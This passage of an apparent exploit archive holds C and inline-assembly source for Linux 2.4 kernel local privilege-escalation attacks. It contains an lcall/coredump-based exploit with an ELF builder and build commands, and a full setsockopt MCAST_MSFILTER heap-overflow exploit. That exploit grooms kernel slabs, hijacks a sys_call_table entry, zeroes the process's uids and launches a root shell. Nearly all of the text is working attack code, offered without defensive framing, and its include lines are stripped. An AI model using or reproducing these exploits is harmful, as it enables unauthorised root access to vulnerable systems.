pushl %esp
popl %eax
sidt (%eax)
movl 2(%eax),%eax
xorl %ebx,%ebx
movb \$0xfb,%bl
rol \$0x3,%ebx
add %ebx,%eax
movw 6(%eax),%di
rol \$16,%edi
movw (%eax),%di
find_smp:
inc %edi
movb (%edi),%bl
cmpb \$0xe8,%bl
jnz find_smp
inc %edi
add (%edi),%edi
find:
dec %edi
movl (%edi),%eax
and \$0x0000ffff,%eax
cmpl \$0x00ec83,%eax
jnz find
aaaa:
jmp xxx
bback:
push %edi
ret
xxx:
call bback
bbbbbb:
cli ## must do
popa
nop
ret
");

{
struct list_head *runqueue_head;
struct task_struct *init_task;
struct task_struct *current, *parent, *copy_task;
int i;

runqueue_head = (void *) 0xc0335ec0;
init_task = (void *) 0xc037c000;

//__asm__ ("cli");
for(i = 0; i < 100000000; i++) /* wait a moment ... */
__asm__ __volatile__ ("nop");

__asm__ __volatile__ ("
movl (%1),%0;"
:"=r" (parent)
:"r" (20)); /* task pointer of parent */

copy_task = parent->p_cptr;
current = get_current();

runqueue_head->prev = runqueue_head;
runqueue_head->next = runqueue_head;
init_task->prev_task = init_task;
init_task->next_task = init_task;

/*
for (i = 0; i < 20; i++) {
tsk = find_task_by_pid(i);
if (tsk && tsk->state == 0) {
__list_add(&tsk->run_list, runqueue_head, runqueue_head->next);
add_task_list(&init_task, tsk);
}
}
*/

if (parent->state == 0) {
__list_add(&parent->run_list, runqueue_head, runqueue_head->next);
add_task_list(init_task, parent);
}

if (parent->p_pptr->state == 0) {
__list_add(&parent->p_pptr->run_list, runqueue_head, runqueue_head->next);
add_task_list(init_task, parent->p_pptr);
}

memcpy(current, copy_task, sizeof(struct task_struct));

__list_add(¤t->run_list, runqueue_head, runqueue_head->next);
add_task_list(init_task, current);

/*
* current->p_opptr
* current->p_pptr
*/
current->p_cptr = NULL;
current->p_ysptr = NULL;
current->p_osptr = NULL;
current->pid = 65535;
current->state = -1;
current->need_resched = 1;
current->sigpending = 0;
}

#ifdef __TEST_LCALL__
i = 'A';
for (;;)
g_write(1, &i, 1);
for (;;) __asm__ __volatile__("hlt");
#endif

/* __asm__ ("sti"); */
}

/*
extern exploit;
__asm__ (
"exploit:\n\t"
"cli \n\t"
"hlt \n\t"
"int3 \n\t"
);
*/

void exploit_end(void) {}

static inline g_syscall3(int, sigaction, int, signum, const struct sigaction *, act,
struct sigaction *, oldact)

void lcall(void);
void lcall_end(void);

void lcall(void)
{
struct sigaction old, new;
void *loop_addr;

__asm__ volatile (
"jmp get_loop_addr\n\t"
"ret_loop_addr:\n\t"
"popl %0\n\t"
:"=m" (loop_addr) :);

bzero(&new, sizeof(new));
new.sa_handler = loop_addr;
g_sigaction(SIGSEGV, &new, &old);

__asm__ volatile (
"jmp do_lcall;"
"get_loop_addr: "
"call ret_loop_addr;"
"ret;"
"do_lcall:"
);
while (1) {
__asm__ ("lcall \$0x7, \$0x0");
}
}
void lcall_end(void) {}

int main()
{
#define ENTRY_OFFSET 4096
int fd = -1;
Elf32_Ehdr ehdr;
Elf32_Phdr phdr;
Elf32_Shdr shdr;
int i;
unsigned char code_align[4096];

fd = open("lcall", O_WRONLY|O_CREAT|O_TRUNC, S_IRWXU);
if (fd == -1) {
perror("open lcall");
goto err;
}

memset(&ehdr, 0, sizeof(ehdr));

ehdr.e_ident[EI_MAG0] = 0x7f;
ehdr.e_ident[EI_MAG1] = 'E';
ehdr.e_ident[EI_MAG2] = 'L';
ehdr.e_ident[EI_MAG3] = 'F';
ehdr.e_ident[EI_CLASS] = ELFCLASS32;
ehdr.e_ident[EI_DATA] = ELFDATA2LSB;
ehdr.e_ident[EI_VERSION] = EV_CURRENT;

ehdr.e_type = ET_EXEC ;
ehdr.e_machine = EM_386;
ehdr.e_version = EV_CURRENT;

ehdr.e_ehsize = sizeof(Elf32_Ehdr);
ehdr.e_phentsize = sizeof(Elf32_Phdr);
ehdr.e_shentsize = sizeof(Elf32_Shdr);

ehdr.e_phnum = 2;
ehdr.e_phoff = sizeof(Elf32_Ehdr);
ehdr.e_shnum = 0;
ehdr.e_shoff = 0;

ehdr.e_shstrndx = 0;
ehdr.e_flags = 0;
ehdr.e_entry = 0x08480000 + ENTRY_OFFSET;

write(fd, &ehdr, sizeof(ehdr)); /* Elf header */

phdr.p_type = PT_LOAD;
phdr.p_offset = 0;
phdr.p_vaddr = 0x08480000;
phdr.p_paddr = phdr.p_vaddr;
phdr.p_filesz = ENTRY_OFFSET + sizeof(code_align);
phdr.p_memsz = ENTRY_OFFSET + sizeof(code_align);
phdr.p_flags = PF_R|PF_X|PF_W;
phdr.p_align = 0x1000;

write(fd, &phdr, sizeof(phdr)); /* Phdr header - PT_LOAD */

phdr.p_type = PT_LOAD;
phdr.p_offset = ENTRY_OFFSET + sizeof(code_align);
phdr.p_vaddr = 0x0;
phdr.p_paddr = phdr.p_vaddr;
phdr.p_filesz = sizeof(code_align);
phdr.p_memsz = sizeof(code_align);
phdr.p_flags = PF_R|PF_X|PF_W;
phdr.p_align = 0x1000;

write(fd, &phdr, sizeof(phdr)); /* Phdr header - PT_LOAD */

memset(code_align, '\x90', sizeof(code_align));
memcpy(code_align, lcall, &lcall_end - &lcall);
lseek(fd, ENTRY_OFFSET, SEEK_SET);
write(fd, code_align, sizeof(code_align)); /* part of TEXT Segment */

/* virtual address 0x00000000:
* [execdomain name pointer][handler for syscalls][stack & register save][jmp code][task pointer of parent])
* 4 4 8 4 4
*/
memset(code_align, '\x90', sizeof(code_align));
memcpy(code_align, "\x90\x90\xff\x25\x08\x00\x00\x00", 8); /* handler for syscalls */
// memcpy(code_align, "\x00\x00\x00\x00\x08\x00\x00\x00", 8); /* handler for syscalls */
memcpy(code_align+8, &exploit, &exploit_end - &exploit);
// memcpy(code_align, sc, sizeof(sc));
lseek(fd, ENTRY_OFFSET + sizeof(code_align), SEEK_SET);
write(fd, code_align, sizeof(code_align)); /* 0x0 Segment for lcall27 */

close(fd);
return 0;
err:
if (fd != -1)
close(fd);
return -1;
}
__EOF__

## kexp_coredump.c
cat <<> kexp_coredump.c
/*
* Written by :
* grip2
* airsupply
*/

#include
#include
#include
#include

#include
#include

#define BINELF_OVERFLOW "overflow"
#define BINELF_LCALL "lcall"

#include
#include
#include
#include
#include

void *first_o_task = NULL;
void *o_task, *y_task;
void *parent_task = NULL;

struct list_head {
struct list_head *next, *prev;
};


struct task_struct {
/*
* offsets of these are hardcoded elsewhere - touch with care
*/
volatile long state; /* -1 unrunnable, 0 runnable, >0 stopped */
unsigned long flags; /* per process flags, defined below */
int sigpending;
unsigned long addr_limit; /* thread address space:
0-0xBFFFFFFF for user-thead
0-0xFFFFFFFF for kernel-thread
*/
struct exec_domain *exec_domain;
volatile long need_resched;
unsigned long ptrace;

int lock_depth; /* Lock depth */

/*
* offset 32 begins here on 32-bit platforms. We keep
* all fields in a single cacheline that are needed for
* the goodness() loop in schedule().
*/
long counter;
long nice;
unsigned long policy;
void *mm;
int processor;
/*
* cpus_runnable is ~0 if the process is not running on any
* CPU. It's (1 << cpu) if it's running on a CPU. This mask
* is updated under the runqueue lock.
*
* To determine whether a process might run on a CPU, this
* mask is AND-ed with cpus_allowed.
*/
unsigned long cpus_runnable, cpus_allowed;
/*
* (only the 'next' pointer fits into the cacheline, but
* that's just fine.)
*/
struct list_head run_list;
unsigned long sleep_time;

struct task_struct *next_task, *prev_task;
void *active_mm;
struct list_head local_pages;
unsigned int allocation_order, nr_local_pages;

/* task state */
void *binfmt;
int exit_code, exit_signal;
int pdeath_signal; /* The signal sent when the parent dies */
/* ??? */
unsigned long personality;
int did_exec:1;
unsigned task_dumpable:1;
pid_t pid;
pid_t pgrp;
pid_t tty_old_pgrp;
pid_t session;
pid_t tgid;
/* boolean value for session group leader */
int leader;
/*
* pointers to (original) parent process, youngest child, younger sibling,
* older sibling, respectively. (p->father can be replaced with
* p->p_pptr->pid)
*/
struct task_struct *p_opptr, *p_pptr, *p_cptr, *p_ysptr, *p_osptr;
struct list_head thread_group;

/* PID hash table linkage. */
struct task_struct *pidhash_next;
struct task_struct **pidhash_pprev;

struct list_head wait_chldexit; /* for wait4() */
};

static int read_coredump(int pid)
{
char corefile[128];
char _task[0x1000];
FILE *fd=NULL;
int tmp_size;
int rd_len=0;
struct task_struct *ptask;
// task_struct *task_s;
Elf32_Ehdr ehdr;
Elf32_Phdr phdr;
Elf32_Nhdr nhdr;

memset(corefile,0,sizeof(corefile));
memset(_task,0,sizeof(_task));
sprintf(corefile,"./core.%d",pid);
printf("opening:%s\n",corefile);
if((fd=open(corefile,O_RDONLY))==NULL)
{
perror("open coredump file:");
exit(-1);
}
// lseek(fd,sizeof(Elf32_Ehdr),SEEK_SET);
read(fd,&ehdr,sizeof(Elf32_Ehdr));
read(fd,&phdr,sizeof(Elf32_Phdr));
/*
printf("sizeof Elf32_Ehdr:%x\n",sizeof(Elf32_Ehdr));
printf("ehdr.e_phoff:%x\n",ehdr.e_phoff);
printf("ehdr.e_phnum:%x\n",ehdr.e_phnum);
printf("phdr.p_type:%x\n",phdr.p_type);
printf("phdr.p_offset:%x\n",phdr.p_offset);
printf("phdr.p_filesz:%x\n",phdr.p_filesz);
*/
//read Elf32_Nhdr elf_note
lseek(fd,phdr.p_offset,SEEK_SET);
while(1){
read(fd,&nhdr,sizeof(Elf32_Nhdr));
if(nhdr.n_type==0x4)
break;
// printf("%x\n",nhdr.n_descsz);
lseek(fd,nhdr.n_descsz+4,SEEK_CUR);
}
lseek(fd,4,SEEK_CUR);
rd_len=read(fd,&_task,nhdr.n_descsz);
ptask=(struct task_struct *)&_task;
// printf("pid: %d\n",ptask->pid);

y_task = ptask->p_ysptr;
o_task = ptask->p_osptr;

if (!first_o_task)
first_o_task = o_task;

if (!parent_task)
parent_task = ptask->p_pptr;

// printf("parent: %p\n", ptask->p_pptr);
return 0;

}

static int check_coredump(int pid)
{
int n;
if (read_coredump(pid) == -1)
return 0;

n = ((long) y_task - (long) first_o_task) / 8192;
printf("parent: %p overflow: %p lcall: %p [%d]\n",
parent_task, first_o_task, y_task, n);

if (n > 0 && n <= 10)
return 1;
return 0;
}

static void make_coredump()
{
struct rlimit rl;
int res;

rl.rlim_cur = RLIM_INFINITY;
rl.rlim_max = RLIM_INFINITY;
res = setrlimit(RLIMIT_CORE, &rl);
if (res != 0) {
perror("setrlimit");
return;
}

*(int *) 0 = 0;
}

static int fix_lcall()
{
int fd;

fd = open(BINELF_LCALL, O_RDWR);
if (fd == -1) {
perror("open "BINELF_LCALL);
return -1;
}

/* virtual address 0x00000000:
* [execdomain name pointer][handler for syscalls][stack & register save][jmp code][task pointer of parent])
* 4 4 8 4 4
*/
lseek(fd, 8192+4+4+8+4, SEEK_SET);
write(fd, &parent_task, sizeof(parent_task));
close(fd);
return 0;
}

int main(int argc, char *argv[])
{
int pipe_of[2] = {-1, -1};
int pipe_lcall[2] = {-1, -1};
int pipe_mcd[2] = {-1, -1};
int mcd_pid, lcall_pid, copy_pid;
int status;
int i;

if (pipe(pipe_of) == -1) {
perror("pipe overflow");
goto err;
}
if (pipe(pipe_mcd) == -1) {
perror("pipe make_coredump");
goto err;
}
if (pipe(pipe_lcall) == -1) {
perror("pipe_lcall");
goto err;
}

/* overflow process */
if (fork() == 0) {
char cmd[32];
if (read(pipe_of[0], cmd, sizeof(cmd)) == -1) {
perror("read pipe_of");
exit(1);
}
if (strncmp(cmd, "start", 5) == 0) {
char *p[] = {BINELF_OVERFLOW, cmd+5, 0};
execve(BINELF_OVERFLOW, p, 0);
perror(BINELF_OVERFLOW);
}
else if (strcmp(cmd, "stop") == 0) {
exit(0);
}
fprintf(stderr, "pipe_of command \"%s\" error!\n", cmd);
exit(1);
}

while (1) {
/* make coredump file process */
if ((mcd_pid = fork()) == 0) {
char cmd[8];
if (read(pipe_mcd[0], cmd, sizeof(cmd)) == -1) {
perror("read pipe_mcd");
exit(1);
}
if (strcmp(cmd, "start") == 0) {
make_coredump();
fprintf(stderr, "make coredump file failed!\n");
exit(1);
}
else if (strcmp(cmd, "stop") == 0) {
exit(0);
}

fprintf(stderr, "pipe_mcd command \"%s\" error!\n", cmd);
exit(1);
}

/* lcall process */
if ((lcall_pid = fork()) == 0) {
char cmd[8];
if (read(pipe_lcall[0], cmd, sizeof(cmd)) == -1) {
perror("read pipe_lcall");
exit(1);
}
if (strcmp(cmd, "start") == 0) {
char *p[] = {BINELF_LCALL, 0};
execve(BINELF_LCALL, p, 0);
perror(BINELF_LCALL);
exit(1);
}
else if (strcmp(cmd, "pause") == 0) {
pause();
exit(0);
}
else if (strcmp(cmd, "stop") == 0) {
exit(0);
}
fprintf(stderr, "pipe_lcall command \"%s\" error!\n", cmd);
exit(-1);
}

write(pipe_mcd[1], "start", 6);
sleep(1);
while (1) {
if (waitpid(mcd_pid, &status, 0) < 0)
break;
}

if (!check_coredump(mcd_pid)) {
write(pipe_lcall[1], "pause", 6);
system("rm -rf core.*");
continue;
}

break;
}

if (fix_lcall() == -1)
goto err;

if ((copy_pid = fork()) == 0) {
char *p[] = {"lcall", 0};
execve("lcall", p, 0);
perror("lcall");
while (1)
printf("panic ...\n");
}

write(pipe_lcall[1], "start", 6);
sleep(1);
kill(copy_pid, SIGSTOP);
printf("please press to start ...\n");
getchar();
printf("exploiting, wait a moment ...\n");

char ofcmd[16];
sprintf(ofcmd, "start%d\0", lcall_pid);
write(pipe_of[1], ofcmd, strlen(ofcmd)+1);

FILE *fp;
char buf[256];
while(1) {
printf("******** in parent, waiting for root\n");
fp = fopen("/proc/interrupts","r");
while (!feof(fp)) {
fgets(buf, sizeof(buf), fp);
printf(buf);
}
fclose(fp);
for(i = 0; i < 2000000000; i++);
}
return 0;
err:
if (pipe_lcall[0] != -1) {
close(pipe_lcall[0]);
close(pipe_lcall[1]);
}
if (pipe_mcd[0] != -1) {
close(pipe_mcd[0]);
close(pipe_mcd[1]);
}
if (pipe_of[1] != -1) {
close(pipe_of[0]);
close(pipe_of[1]);
}
return 1;
}
__EOF__


make kexp_coredump
make overflow
make mkbadelf
gcc mklcall.c -o mklcall -O2
./mkbadelf
./mklcall
./kexp_coredump

Linux kernel setsockopt MCAST_MSFILTER权限提升(EXP)

/*
* Linux kernel setsockopt MCAST_MSFILTER privilege elevation
* For kernel 2.4.22 - 2.4.25
*
* 2006-04-07
* Written by grip2
* Thanks airsupply
*
* grip2@debian:~/kernel-sec/exp-msfilter$ ./kexp-msfilter
* numsrc: 0x4000000c msize: 0x40 gsize: 0x68c optlen: 0x68c
* Prepare ...
* full_numsrc: 15 overflow_numsrc: 3
* size-64 87 118 64 2 2 1
* size-64 119 177 64 3 3 1
* Exploiting ...
* setsockopt: Cannot assign requested address
* sh-2.05b#
**/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define KB * 1024
#define MB * 1024 KB
#define GB * 1024 MB
#define NOP 'A'
int uid, gid;
unsigned task_size;
unsigned user_cs,user_ds;

void **sys_call_table;
#define __NR_hijack_getroot 0
static inline _syscall1(int, hijack_getroot, unsigned long *, val)

#define SOL_IP 0
#define MY_NUMSRC 12

#define SIZE_PIPE_INODE_INFO 64 /* sizeof(struct pipe_inode_info) */
#define SLAB_SIZE (fix_slabsize(SIZE_PIPE_INODE_INFO))

#define MAX_SEM_LIMIT 4096
static int sem_handles[MAX_SEM_LIMIT];
static int sem_count = 0;

/*
* (kernel-2.4.22) -- ipc/sem.c
* ...
* size = sizeof (*sma) + nsems * sizeof (struct sem);
* sma = (struct sem_array *) ipc_alloc(size);
* ...
*/
#define COMPUTE_NSEMS(slabsize) (((fix_slabsize(slabsize)) - 56) / 8);

static int fix_slabsize(slabsize)
{
/*
* (kernel-2.4.22)
**/
int cache_sizes[] = {
#if PAGE_SIZE == 4096
32,
#endif
64,
128,
256,
512,
1024,
2048,
4096,
8192,
16384,
32768,
65536,
131072,
};

int num, i;

num = sizeof(cache_sizes)/sizeof(int);
for (i = 0; i < num; i++) {
if (cache_sizes[i] < slabsize)
continue;
slabsize = cache_sizes[i];
break;
}

return slabsize;
}

unsigned long get_sys_call_table(void)
{
FILE *fp;
char linebuf[128];
char stuff[64];
unsigned long addr;
int found = 0;
int r;

fp = fopen("/proc/ksyms", "r");
if (fp == NULL) {
perror("fopen /proc/ksyms");
return;
}

while (!feof(fp)) {
if (!fgets(linebuf, sizeof(linebuf), fp))
continue;

memset(stuff, 0 ,sizeof(stuff));
r = sscanf(linebuf, "%x %s", &addr, stuff);
if (r != 2 || !strstr(stuff, "sys_call_table"))
continue;

printf(linebuf);
found = 1;
break;
}

fclose(fp);
return found ? addr : 0;
}

static void prepare_slab(int slabsize, int left)
{
FILE *fp;
char linebuf[128];
int r, found = 0;
int s_size, s_active, s_total;
int nsems;

slabsize = fix_slabsize(slabsize);
nsems = COMPUTE_NSEMS(slabsize);

fp = fopen("/proc/slabinfo", "r");
if (fp == NULL) {
perror("fopen /proc/slabinfo");
return;
}

while (!feof(fp)) {
if (!fgets(linebuf, sizeof(linebuf), fp))
continue;

r = sscanf(linebuf, "size-%d %d %d", &s_size, &s_active, &s_total);
if (r != 3 || s_size != slabsize)
continue;

printf(linebuf);
found = 1;
break;
}
fclose(fp);

if (found) {
int i, num;

num = s_total - s_active - left;
num = (num <= (MAX_SEM_LIMIT-sem_count)) ? num : (MAX_SEM_LIMIT-sem_count);
for (i = sem_count; i < num; i++, sem_count++) {
sem_handles[i] = semget(IPC_PRIVATE, nsems, IPC_CREAT);
}
}

return;
}

static void de_prepare_slab()
{
int i;

for (i = 0; i < sem_count; i++) {
if (sem_handles[i] != -1)
if (semctl(sem_handles[i], 0, IPC_RMID)) perror("ipc_rmid");
}
sem_count = 0;
}

void shellcode(void)
{
char *p[] ={"/bin/sh", 0};
// de_prepare_slab();
execve("/bin/sh",p,0);
_exit(0);
}

void configure(void)
{
unsigned val;
task_size = ((unsigned)&val + 1 GB ) / (1 GB) * 1 GB;
uid = getuid();
gid = getgid();
user_ds = myget_ds();
user_cs = myget_cs();

}
void kernel(unsigned * task)
{
unsigned * addr = task;

/* looking for uids */
while (addr[0] != uid || addr[1] != uid ||
addr[2] != uid || addr[3] != uid
)
addr++;

addr[0] = addr[1] = addr[2] = addr[3] = 0; /* set uids */
addr[4] = addr[5] = addr[6] = addr[7] = 0; /* set gids */
}

void set_root(unsigned int *ts)
{
if((unsigned int*)*ts!=NULL)
ts = (int*)*ts;

int cntr;
for(cntr = 0; cntr <= 512; cntr++, ts++)
if( ts[0] == uid && ts[1] == uid && ts[4] == gid && ts[5] == gid)
ts[0] = ts[1] = ts[4] = ts[5] = 0;
}

int myget_cs()
{
__asm__("movl %cs,%eax\n");
}
int myget_ds()
{
__asm__("movl %ds,%eax\n");
}

/*
* kernel 2.4.x/2.6.x privilege elevator
**/
extern load_highlevel;
__asm__
(
"load_highlevel: \n\t"
"mov $0xffffe000,%eax\n\t"
"and %esp,%eax \n\t"
"pushl %eax \n\t"
"call set_root \n\t"
"pop %eax \n\t"
"cli \n\t"
"movl $user_ds,%eax \n\t"
"pushl (%eax)\n"
"pop %ds \n\t" /* DS */
"pushl %ds \n\t" /* SS */
"pushl $0xc0000000 \n\t" /* ESP */
"pushl $0x246 \n\t" /* EFLAGS */
"movl $user_cs,%eax \n\t" /* CS */
"pushl (%eax) \n\t"
"pushl $shellcode \n\t"
"iret \n\t"
);

int main(int argc, char *argv[])
{
int sock = -1;
int victim_pipe[2] = {-1, -1};
int holderid = -1;
struct group_filter *gsf = NULL; /* &optval */
int optlen, optlen_align;
int nsems;
int pid;
int status;

unsigned int numsrc, full_numsrc, of_numsrc /* overflow numsrc */;
int msize, gsize, i;
struct sockaddr_in *psin;

sys_call_table = (void *) get_sys_call_table();
if (!sys_call_table)
goto err;

sock = socket(PF_INET, SOCK_STREAM, 0);
if (sock == -1) {
perror("socket");
goto err;
}

optlen = sizeof(struct group_filter) +
sizeof(struct sockaddr_storage) * (MY_NUMSRC-1);
optlen_align = fix_slabsize(optlen);
/*
* (kernel-2.4.22)
* ...
* define IP_MSFILTER_SIZE(numsrc) \
* (sizeof(struct ip_msfilter) - sizeof(__u32) \
* + (numsrc) * sizeof(__u32))
*/
numsrc = ((4 - (sizeof(struct ip_msfilter) - 4)))/4 + (SLAB_SIZE - 4)/4;
msize = IP_MSFILTER_SIZE(numsrc);
gsize = GROUP_FILTER_SIZE(numsrc);
printf("numsrc: 0x%x msize: 0x%x gsize: 0x%x optlen: 0x%x\n",
numsrc, msize, gsize, optlen);

if (argc == 2 && !strcmp(argv[1], "-w"))
exit(EXIT_SUCCESS);

gsf = malloc(optlen_align);
if (gsf == NULL) {
perror("malloc");
goto err;
}
memset(gsf, 'A', optlen);

/*
* Prepare
**/
printf("Prepare ...\n");
gsf->gf_numsrc = numsrc;
gsf->gf_interface = 0;
gsf->gf_fmode = 0;
psin = (struct sockaddr_in *) &gsf->gf_group;
psin->sin_family = AF_INET;

for (i = 0; i < MY_NUMSRC; i++) {
psin = (struct sockaddr_in *) &gsf->gf_slist[i];
psin->sin_family = AF_INET;
psin->sin_addr.s_addr = 0x43434343;
}

full_numsrc = (optlen_align - sizeof(struct group_filter))
/ sizeof(gsf->gf_slist[0]) + 1 + 1;
of_numsrc = full_numsrc
- ((SLAB_SIZE - 20 /* sizeof(struct ip_msfilter) */) / 4 + 1);
printf("full_numsrc: %d \toverflow_numsrc: %d\n", full_numsrc, of_numsrc);

for (; i < full_numsrc; i++) {
psin = (struct sockaddr_in *) &gsf->gf_slist[i];
psin->sin_family = AF_INET;
psin->sin_addr.s_addr = 0x44444444;
}
assert(of_numsrc == 3);
psin = (struct sockaddr_in *) &gsf->gf_slist[full_numsrc-of_numsrc-1+3]; /* char *base */
psin->sin_addr.s_addr = (unsigned int) &sys_call_table[__NR_hijack_getroot];

setsockopt(sock, SOL_IP, MCAST_MSFILTER, gsf, optlen_align);
prepare_slab(SLAB_SIZE, -1);
prepare_slab(SLAB_SIZE, 4);

nsems = COMPUTE_NSEMS(SLAB_SIZE);
holderid = semget(IPC_PRIVATE, nsems, IPC_CREAT);
if (holderid == -1) {
perror("semget IPC_NEW");
goto err;
}

if (pipe(victim_pipe) == -1) {
perror("pipe");
goto err;
}

semctl(holderid, 0, IPC_RMID);
printf("Exploiting ...\n");
semctl(holderid, 0, IPC_RMID);
if (setsockopt(sock, SOL_IP, MCAST_MSFILTER, gsf, optlen) == -1)
perror("setsockopt");

/*
* Get root
**/
char *p_load_highlevel = (void *) &load_highlevel;
if (fork() == 0)
{
int cnt;
close(0);
close(1);
close(2);
alarm(1);
cnt = write(victim_pipe[1], &p_load_highlevel, 4);
//cnt = read(victim_pipe[0], buf, 0); /* for test base_addr */
if (cnt == -1) {
perror("write pipe");
goto err;
}
exit(0);
}
sleep(2);

if ((pid = fork()) == 0) {
configure();
hijack_getroot(0);

printf("Failed to get root!\n");
_exit(-1);
}

while (1) {
if (waitpid(pid, &status, 0) < 0)
break;
}

de_prepare_slab();
free(gsf);
close(sock);

close(victim_pipe[0]);
close(victim_pipe[1]);
return EXIT_SUCCESS;
err:
if (victim_pipe[0] > 0) {
close(victim_pipe[0]);
close(victim_pipe[1]);
}

de_prepare_slab(); /* it's safe */

if (holderid != -1)
semctl(holderid, 0, IPC_RMID);
if (gsf)
free(gsf);
if (sock != -1)
close(sock);
return EXIT_FAILURE;
}